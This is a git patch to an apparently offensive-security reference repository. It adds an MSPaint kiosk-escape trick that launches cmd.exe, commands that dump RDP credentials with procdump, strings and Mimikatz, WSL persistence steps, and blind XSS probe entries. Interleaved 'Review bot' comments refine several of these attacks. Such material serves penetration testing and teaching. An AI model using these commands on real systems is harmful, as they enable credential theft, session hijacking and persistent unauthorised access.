From 14cc88371d2bc4bedb2e08b786b45213c7fd064c Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 11 Feb 2023 17:49:55 +0100
Subject: [PATCH] WSL + RDP Passwords + MSPaint Escape
---
.../Active Directory Attack.md | 2 ++
Methodology and Resources/Escape Breakout.md | 21 +++++++-----
.../Windows - Mimikatz.md | 34 +++++++++++++++++--
.../Windows - Persistence.md | 17 ++++++++++
XSS Injection/README.md | 13 ++++---
5 files changed, 72 insertions(+), 15 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index c31018f..c3f20ee 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -4186,3 +4186,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
+* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/)
+* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
\ No newline at end of file
diff --git a/Methodology and Resources/Escape Breakout.md b/Methodology and Resources/Escape Breakout.md
index b66a737..8fb8528 100644
--- a/Methodology and Resources/Escape Breakout.md
+++ b/Methodology and Resources/Escape Breakout.md
@@ -26,18 +26,20 @@
* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
* **Task Manager**: `File` > `New Task (Run...)` > `cmd`
* **MSPAINT.exe**
- * Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
+ * Open MSPaint.exe and set the canvas size to: `Width=6` and `Height=1` pixels
* Zoom in to make the following tasks easier
* Using the colour picker, set pixels values to (from left to right):
- * 1st: R: 10, G: 0, B: 0
- * 2nd: R: 13, G: 10, B: 13
- * 3rd: R: 100, G: 109, B: 99
- * 4th: R: 120, G: 101, B: 46
- * 5th: R: 0, G: 0, B: 101
- * 6th: R: 0, G: 0, B: 0
+ ```ps1
+ 1st: R: 10, G: 0, B: 0
+ 2nd: R: 13, G: 10, B: 13
+ 3rd: R: 100, G: 109, B: 99
+ 4th: R: 120, G: 101, B: 46
+ 5th: R: 0, G: 0, B: 101
+ 6th: R: 0, G: 0, B: 0
+ ```
* Save it as 24-bit Bitmap (*.bmp;*.dib)
* Change its extension from bmp to bat and run
-
+
## Sticky Keys
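Review bot: The new fence around the pixel table is tagged `ps1`, but the six lines are colour values, not PowerShell; tag it `text` (or leave it untagged) so the highlighting does not suggest these are commands to type. A one-line why would also make the trick reproducible from memory: a 24-bit BMP stores each pixel as B,G,R bytes, so read left to right these six pixels decode to line breaks followed by `cmd.exe` (the 1-pixel-high canvas avoids any row-ordering concerns), and when the file runs as a `.bat` the BMP header only produces "not recognized" errors before `cmd.exe` launches — if I have decoded the values right. Worth adding the practical caveat that the last step depends on the kiosk's Save dialog letting you rename the file to `.bat` (extensions visible and editable); where that is locked down this path fails before execution.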
@@ -146,4 +148,5 @@ firefox irc://127.0.0.1 -P "Test"
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
-* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
\ No newline at end of file
+* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
+* [HOW TO LAUNCH COMMAND PROMPT AND POWERSHELL FROM MS PAINT - 2022-05-14 - Rickard](https://tzusec.com/how-to-launch-command-prompt-and-powershell-from-ms-paint/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md
index 403a2d2..20b614c 100644
--- a/Methodology and Resources/Windows - Mimikatz.md
+++ b/Methodology and Resources/Windows - Mimikatz.md
@@ -9,7 +9,8 @@
* [Pass The Hash](#pass-the-hash)
* [Golden ticket](#golden-ticket)
* [Skeleton key](#skeleton-key)
-* [RDP session takeover](#rdp-session-takeover)
+* [RDP Session Takeover](#rdp-session-takeover)
+* [RDP Passwords](#rdp-passwords)
* [Credential Manager & DPAPI](#credential-manager--dpapi)
* [Chrome Cookies & Credential](#chrome-cookies--credential)
* [Task Scheduled credentials](#task-scheduled-credentials)
@@ -168,7 +169,7 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
```
-## RDP session takeover
+## RDP Session Takeover
Use `ts::multirdp` to patch the RDP service to allow more than two users.
@@ -195,6 +196,34 @@ create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack
```
+## RDP Passwords
+
+Verify if the service is running:
+
+```ps1
+sc queryex termservice
+tasklist /M:rdpcorets.dll
+netstat -nob | Select-String TermService -Context 1
+```
+
+* Extract passwords manually
+ ```ps1
+ procdump64.exe -ma 988 -accepteula C:\svchost.dmp
+ strings -el svchost* | grep Password123 -C3
+ ```
+* Extract passwords using Mimikatz
+ ```ps1
+ privilege::debug
+ ts::logonpasswords
+ ```
+
+
+
+
+
+
+
+
## Credential Manager & DPAPI
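Review bot: `procdump64.exe -ma 988` hard-codes a PID that only existed on the machine the source post was written on; the three commands above it exist precisely to locate the svchost hosting TermService, so the dump line should consume their output, e.g. `procdump64.exe -ma <TermService svchost PID> -accepteula C:\svchost.dmp`. Likewise `grep Password123 -C3` only works when the operator already knows the password; a more honest example greps for the account that logged on over RDP, `strings -el svchost* | grep <username> -C3`, since the plaintext is found next to it in the dump. A short why on `-el` — it extracts 16-bit little-endian (UTF-16) strings, presumably because that is how the RDP credentials sit in memory — would save readers from running plain `strings` and finding nothing. Finally, the seven blank lines after the Mimikatz block, just before `## Credential Manager & DPAPI`, look accidental; one blank line matches the rest of the file.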
@@ -286,3 +315,4 @@ More information can be grabbed from the Memory with :
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/)
+- [Dumping RDP Credentials - MAY 24, 2021](https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index a71b893..579c2de 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -33,6 +33,7 @@
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
* [Skeleton Key](#skeleton-key)
* [Virtual Machines](#virtual-machines)
+ * [Windows Subsystem for Linux](#windows-subsystem-for-linux)
* [Domain](#domain)
* [Golden Certificate](#golden-certificate)
* [Golden Ticket](#golden-ticket)
@@ -539,6 +540,22 @@ sudo mkdir /mnt/c
sudo mount -t vboxsf shadow_c /mnt/c
```
+### Windows Subsystem for Linux
+
+```ps1
+# List and install online packages
+wsl --list --online
+wsl --install -d kali-linux
+
+# Use a local package
+wsl --set-default-version 2
+curl.exe --insecure -L -o debian.appx https://aka.ms/wsl-debian-gnulinux
+Add-AppxPackage .\debian.appx
+
+# Run the machine as root
+wsl kali-linux --user root
+```
+
## Domain
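Review bot: `wsl kali-linux --user root` under `# Run the machine as root` does not select a distribution — `wsl` treats a bare first argument as the command line to execute, so this would try to run `kali-linux --user root` inside the default distro; the form matching the install line above is `wsl -d kali-linux --user root`. The `--insecure` on the `curl.exe` download also deserves a second look: it disables TLS certificate validation for a package that is then installed with `Add-AppxPackage`, so anyone on path can substitute the appx, and `https://aka.ms/wsl-debian-gnulinux` serves a valid chain; if the flag is only there for TLS-inspecting proxy labs, say so in a comment such as `# drop --insecure unless a TLS-intercepting proxy is in the way`. It is also worth noting that `wsl --install` and `Add-AppxPackage` need an elevated interactive session and the former may require a reboot, which matters when this is being used as a persistence technique.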
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 2f5ea7a..59087ac 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -510,13 +510,18 @@ document.getElementById('btn').onclick = function(e){
### XSS Hunter
-XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). You can set up an alternative version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
-
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
+XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app).
+
+You can set up an alternative version
+* Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
+* Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
+
```xml
-">
-
+">
+">
+
```
### Other Blind XSS tools
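Review bot: As rendered here the two new payload lines inside the `xml` fence show only `">` — if the `<script src=…>` element is really absent from the file the probes are empty, and if it was merely stripped by the rendering, ignore this; either way the fence is better tagged `html`, since the payloads are HTML attribute break-outs rather than XML. The hosted option at xsshunter.trufflesecurity.com deserves the caveat the quoted description already implies: a firing probe sends information about the vulnerable page to a third party, so on engagements where client data may not leave the tester's infrastructure the self-hosted xsshunter-express is the only acceptable choice. A one-line note after the bullet list would cover it, e.g. `> A hosted instance receives the victim page's data; use the self-hosted version where the engagement restricts data handling.`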